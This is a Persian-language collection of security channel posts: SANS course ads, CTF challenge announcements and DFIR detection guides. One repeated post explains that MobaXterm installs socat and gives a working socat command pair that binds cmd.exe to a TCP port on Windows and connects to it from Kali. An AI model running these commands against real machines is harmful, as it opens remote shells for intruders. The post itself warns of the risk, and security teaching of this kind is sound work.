✅ دوره آموزشی SEC401
✔️ در این دوره آموزشی شما با مفاهیم پایه ای حوزه امنیت شبکه و اطلاعات آشنا می شوید. این دوره به عنوان اولین دوره از نقشه راه موسسه SANS مباحث مختلفی را مورد بحث قرار می دهد که در ادامه شما را برای ورود به بخش های دیگر آماده می سازد.
🔰 بخش هایی از سرفصل دوره آموزشی SEC401
Defensible Network Architecture
Networking and Protocols
Network Device Security
Virtualization and Cloud Security
Securing Wireless Networks
Defense-in-Depth
Access Control and Password Management
Security Policy
CIS Controls
Malicious Code and Exploit Mitigation
Securing Web Communications
Vulnerability Scanning and Penetration Testing
Network Security Devices
Endpoint Security
SIEM-Log Management
Active Defense
Cryptography
Cryptography Algorithms and Deployment
Applying Cryptography
Incident Handling and Contingency Planning
🔴 جهت مشاهده جزئیات این دوره و تهیه آن به لینک زیر مراجعه نمایید:
🌐 yun.ir/ztqnld
✔️ در این دوره آموزشی شما با مفاهیم پایه ای حوزه امنیت شبکه و اطلاعات آشنا می شوید. این دوره به عنوان اولین دوره از نقشه راه موسسه SANS مباحث مختلفی را مورد بحث قرار می دهد که در ادامه شما را برای ورود به بخش های دیگر آماده می سازد.
🔰 بخش هایی از سرفصل دوره آموزشی SEC401
Defensible Network Architecture
Networking and Protocols
Network Device Security
Virtualization and Cloud Security
Securing Wireless Networks
Defense-in-Depth
Access Control and Password Management
Security Policy
CIS Controls
Malicious Code and Exploit Mitigation
Securing Web Communications
Vulnerability Scanning and Penetration Testing
Network Security Devices
Endpoint Security
SIEM-Log Management
Active Defense
Cryptography
Cryptography Algorithms and Deployment
Applying Cryptography
Incident Handling and Contingency Planning
🔴 جهت مشاهده جزئیات این دوره و تهیه آن به لینک زیر مراجعه نمایید:
🌐 yun.ir/ztqnld
Forwarded from challenginno.ir
✔️ رایت آپ مربوط به چالش ارتقاء سطح دسترسی در لینوکس 3 - Warm-up هم اکنون در سایت قرار شد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/linux-privilege-escalation-warm-up
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/linux-privilege-escalation-warm-up
سلام و عرض ادب خدمت دوستان گرامی
یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست
ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه
ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست
نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.
مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):
C:\Users\test\AppData\Roaming\MobaXterm\slash\bin
به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره
دستور ایجاد کانکش جهت تست هم به شکل زیر هست:
Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Kali:
socat - TCP4:192.168.66.132:4443
یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست
ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه
ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست
نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.
مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):
C:\Users\test\AppData\Roaming\MobaXterm\slash\bin
به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره
دستور ایجاد کانکش جهت تست هم به شکل زیر هست:
Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Kali:
socat - TCP4:192.168.66.132:4443
Forwarded from challenginno.ir
✔️ یکی از سرویس هایی که در اکثر سازمان ها مورد استفاده قرار می گیرد سرویس Active Directory می باشد.
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ لازم به ذکر است که این چالش اولین چالش مربوط به Active Directory بوده و چالش های دیگر به مرور در سایت قرار داده خواهد شد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/activedirectory-zero
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ لازم به ذکر است که این چالش اولین چالش مربوط به Active Directory بوده و چالش های دیگر به مرور در سایت قرار داده خواهد شد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/activedirectory-zero
Forwarded from dfir
سند راهنمای SOC برای شناسایی و پاسخگویی به سوءاستفاده از آسیبپذیری CVE-2024-21412
👇👇👇👇👇👇
👇👇👇👇👇👇
Forwarded from dfir
سند_راهنمای_SOC_برای_شناسایی_و_پاسخگویی_به_سوءاستفاده_از_آسیب.pdf
810.8 KB
سند راهنمای SOC برای شناسایی و پاسخگویی به سوءاستفاده از آسیبپذیری CVE-2024-21412
Forwarded from dfir
CVE_2024_21412_vulnerability_in_Microsoft_Windows_SmartScreen.csv
2.9 KB
IOC- vulnerability
Forwarded from dfir
سند راهنمای تشخیص تکنیک دور زدن EDR با متد LayeredSyscall
The detection guide document for the EDR evasion technique using the LayeredSyscall method.
به همراه رول های تشخیصی ELK, Sysmon, splunk 👇👇👇👇👇👇👇👇
The detection guide document for the EDR evasion technique using the LayeredSyscall method.
به همراه رول های تشخیصی ELK, Sysmon, splunk 👇👇👇👇👇👇👇👇
✅ کتاب آشنایی با پروتکل HTTP
✔️ با توجه به استفاده روز افزون از وب و تکنولوژیهای مربتط با آن، آشنایی با پروتکل HTTP که پایه و اساس ساختار وب را تشکیل میدهد، بسیار حائز اهمیت است.
✔️ این کتاب که ترجمه کتاب HTTP The Definitive Guide است، به معرفی بخشهای مختلف این پروتکل میپردازد.
🔴 دانستن جزئیات مربوط به پروتکل HTTP برای علاقمندان به حوزههای وب، تست نفوذ وب، باگ بانتی، برنامه نویسان، محققین و دانشجویان فناوری اطلاعات بسیار مفید خواهد بود.
🌐 https://securityworld.ir/HTTP/HTTP-Final.pdf
✔️ با توجه به استفاده روز افزون از وب و تکنولوژیهای مربتط با آن، آشنایی با پروتکل HTTP که پایه و اساس ساختار وب را تشکیل میدهد، بسیار حائز اهمیت است.
✔️ این کتاب که ترجمه کتاب HTTP The Definitive Guide است، به معرفی بخشهای مختلف این پروتکل میپردازد.
🔴 دانستن جزئیات مربوط به پروتکل HTTP برای علاقمندان به حوزههای وب، تست نفوذ وب، باگ بانتی، برنامه نویسان، محققین و دانشجویان فناوری اطلاعات بسیار مفید خواهد بود.
🌐 https://securityworld.ir/HTTP/HTTP-Final.pdf
💡با سلام و عرض ادب خدمت کلیه دوستان گرامی
✔️ موسسه SANS یکی از شرکت های معتبر در زمینه آموزش های امنیت شبکه و اطلاعات می باشد. با توجه به دوره های تفکیک شده ای که این شرکت ارائه می کند، مدتی است که مورد توجه علاقمندان حوزه امنیت قرار گرفته است.
✔️ یکی از دوره هایی که در نقشه راه تست نفوذ موسسه SNAS، مطالعه آن پیشنهاد شده، دوره تست نفوذ وب یا همان SEC542 می باشد.
🔰 هم اکنون این دوره آموزشی به صورت مجزا و در پنج بخش زیر قابل تهیه می باشد:
✅ بخش اول - Introduction and Information Gathering
yun.ir/79yazd
✅ بخش دوم - Configuration, Identity, and Authentication Testing
yun.ir/z0v5pc
✅ بخش سوم - Injection
yun.ir/126apf
✅ بخش چهارم - XSS-XXE
yun.ir/xzat28
✅ بخش پنجم - CSRF, Logic Flaws and Advanced Tools
yun.ir/pkjugd
✔️ موسسه SANS یکی از شرکت های معتبر در زمینه آموزش های امنیت شبکه و اطلاعات می باشد. با توجه به دوره های تفکیک شده ای که این شرکت ارائه می کند، مدتی است که مورد توجه علاقمندان حوزه امنیت قرار گرفته است.
✔️ یکی از دوره هایی که در نقشه راه تست نفوذ موسسه SNAS، مطالعه آن پیشنهاد شده، دوره تست نفوذ وب یا همان SEC542 می باشد.
🔰 هم اکنون این دوره آموزشی به صورت مجزا و در پنج بخش زیر قابل تهیه می باشد:
✅ بخش اول - Introduction and Information Gathering
yun.ir/79yazd
✅ بخش دوم - Configuration, Identity, and Authentication Testing
yun.ir/z0v5pc
✅ بخش سوم - Injection
yun.ir/126apf
✅ بخش چهارم - XSS-XXE
yun.ir/xzat28
✅ بخش پنجم - CSRF, Logic Flaws and Advanced Tools
yun.ir/pkjugd
Forwarded from challenginno.ir
✔️ یکی از فرآیندهایی که بعد از دسترسی یا در مرحله Post Exploitation از آن استفاده میشود، تکنیک های Credential Dumping است.
✅ یکی از روشهایی که در Credential Dumping از آن استفاده میشود، استخراج هش ها از SAM سیستمهای ویندوزی میباشد.
✅ چالش جاری مربوط به همین موضوع میباشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/sam-dump-password-attacks
✅ یکی از روشهایی که در Credential Dumping از آن استفاده میشود، استخراج هش ها از SAM سیستمهای ویندوزی میباشد.
✅ چالش جاری مربوط به همین موضوع میباشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/sam-dump-password-attacks
Forwarded from challenginno.ir
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response
Forwarded from challenginno.ir
✔️ در این چالش، شما باید با تحلیل یک فایل لاگ سیسمون (Sysmon)، فعالیتهای مشکوک و مخرب یک فایل را بر روی یک سیستم عامل ویندوز 10 شناسایی کنید.
✅ فایل لاگ سیسمون ارائه شده را بارگذاری و در یک ابزار تحلیل لاگ (مانند Log Parser، Splunk، یا حتی یک اسکریپت Python) باز کنید.
✅ هدف از این چالش شناسایی فعالیتهای مشکوک و مخرب یک فایل از طریق تحلیل لاگ سیسمون می باشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/detect-malicious-activity
✅ فایل لاگ سیسمون ارائه شده را بارگذاری و در یک ابزار تحلیل لاگ (مانند Log Parser، Splunk، یا حتی یک اسکریپت Python) باز کنید.
✅ هدف از این چالش شناسایی فعالیتهای مشکوک و مخرب یک فایل از طریق تحلیل لاگ سیسمون می باشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/detect-malicious-activity
درود درود
بچه ها تو این چنل میخوایم Security Code Review انجام بدیم.
حالا اصلا این چی هست ؟
- ما میایم و یه تیکه کد آسیب پذیر رو برمیداریم و سعی میکنیم اون آسیب پذیری رو پیدا کنیم و اگر کد پیچیده بود تحلیلش میکنیم.
به چه درد میخوره ؟
- کلا در روز شاید 10 دقیقه وقت بگیره ولی به مرور زمان باعث میشه با نوع نوشتار (Syntax) زبان های مختلف آشنا بشیم ، مایندست برنامه نویسارو به دست بیاریم ، تست های وایت باکس بتو.نیم انجام بدیم ، تست های بلک باکس رو ساده تر درک کنیم و ...
این تحلیل ها هم برای برنامه نویس ها مناسبه که امن تر کد بزنن هم هانترها و هکرا و ردتیمرا و خلاصه که همه.
https://t.iss.one/CodeReview0o0
بچه ها تو این چنل میخوایم Security Code Review انجام بدیم.
حالا اصلا این چی هست ؟
- ما میایم و یه تیکه کد آسیب پذیر رو برمیداریم و سعی میکنیم اون آسیب پذیری رو پیدا کنیم و اگر کد پیچیده بود تحلیلش میکنیم.
به چه درد میخوره ؟
- کلا در روز شاید 10 دقیقه وقت بگیره ولی به مرور زمان باعث میشه با نوع نوشتار (Syntax) زبان های مختلف آشنا بشیم ، مایندست برنامه نویسارو به دست بیاریم ، تست های وایت باکس بتو.نیم انجام بدیم ، تست های بلک باکس رو ساده تر درک کنیم و ...
این تحلیل ها هم برای برنامه نویس ها مناسبه که امن تر کد بزنن هم هانترها و هکرا و ردتیمرا و خلاصه که همه.
https://t.iss.one/CodeReview0o0
Forwarded from challenginno.ir
✔️ آسیب پذیری XSS یا Cross Site Scripting یکی از آسیب پذیری های موجود در وب بوده که در استاندارد OWASP و WSTG نیز به آن اشاره شده است.
✅ این چالش شامل چهار بخش است که در هر بخش شما باید آسیب پذیری XSS را به کمک راهنمایی های موجود در صفحات، اکسپلویت نموده و به فلگ نهایی برسید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/game-with-xss-vulnerability
✅ این چالش شامل چهار بخش است که در هر بخش شما باید آسیب پذیری XSS را به کمک راهنمایی های موجود در صفحات، اکسپلویت نموده و به فلگ نهایی برسید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/game-with-xss-vulnerability
Forwarded from challenginno.ir
✔️ در یکی از سیستمهای حساس شبکه سازمان، نشانههایی از رفتارهای غیرعادی و مشکوک مشاهده شده است. این سیستم، که تا چندی پیش بهطور معمول فعالیت میکرد، اکنون دچار اختلالات پراکندهای شده که توجه تیم امنیتی را به خود جلب کرده است.
✔️ کاربران گزارش دادهاند که عملکرد سیستم کند شده و برخی از فرآیندها بهطور غیرمنتظرهای خاتمه مییابند.
✅ تیم امنیتی با بررسیهای اولیه، نشانههایی از وجود یک عامل مخرب را در سیستم تشخیص داده است.
✅ وظیفه شما این است که با دقت در میان لاگها و فعالیتهای سیستمی، نشانههای فعالیت این تهدید را شناسایی کنید، مکانیزمهای پنهانکاری و پایداری آن را کشف کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/hunting-hidden-threats
✔️ کاربران گزارش دادهاند که عملکرد سیستم کند شده و برخی از فرآیندها بهطور غیرمنتظرهای خاتمه مییابند.
✅ تیم امنیتی با بررسیهای اولیه، نشانههایی از وجود یک عامل مخرب را در سیستم تشخیص داده است.
✅ وظیفه شما این است که با دقت در میان لاگها و فعالیتهای سیستمی، نشانههای فعالیت این تهدید را شناسایی کنید، مکانیزمهای پنهانکاری و پایداری آن را کشف کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/hunting-hidden-threats
Forwarded from challenginno.ir
✔️ همانطور که همه دوستان گرامی استحضار دارند، یکی از متدولوژی های رایج جهت تست نفود برنامه های تحت وب، متدولوژی WSTG بوده که متعلق به OWASP است.
✅ بخش Identity Management Testing از متدولوژی WSTG شامل تست های مختلفی است که در این چالش سعی داریم تا به بررسی برخی از آن ها بپردازیم.
✅ در این چالش شما می بایست ابتدا به مطالعه بخش Identity Management Testing در WSTG بپردازید و سپس بخش های مختلف چالش را مورد بررسی قرار دهید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/wstg-identity-management
✅ بخش Identity Management Testing از متدولوژی WSTG شامل تست های مختلفی است که در این چالش سعی داریم تا به بررسی برخی از آن ها بپردازیم.
✅ در این چالش شما می بایست ابتدا به مطالعه بخش Identity Management Testing در WSTG بپردازید و سپس بخش های مختلف چالش را مورد بررسی قرار دهید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/wstg-identity-management
Forwarded from challenginno.ir
✅ با سلام و عرض ادب خدمت تمامی دوستان گرامی
ابتدا بر خود لازم می دانیم تا از تمام دوستانی که در هر چه بهتر شدن وب سایت Challenginno و چالش های آن ما را یاری نمودند سپاسگزاری کنیم.
🔴 در راستای اهدافی که برای پلتفرم Challenginno در نظر گرفته شده بود، پس از چالش های آفلاین، بزودی چالش های آنلاین نیز در قالب Red Time و Blue Time ارائه خواهد شد.
🔸 منتظر خبرهای بعدی ما باشید.
🌐 https://challenginno.ir
ابتدا بر خود لازم می دانیم تا از تمام دوستانی که در هر چه بهتر شدن وب سایت Challenginno و چالش های آن ما را یاری نمودند سپاسگزاری کنیم.
🔴 در راستای اهدافی که برای پلتفرم Challenginno در نظر گرفته شده بود، پس از چالش های آفلاین، بزودی چالش های آنلاین نیز در قالب Red Time و Blue Time ارائه خواهد شد.
🔸 منتظر خبرهای بعدی ما باشید.
🌐 https://challenginno.ir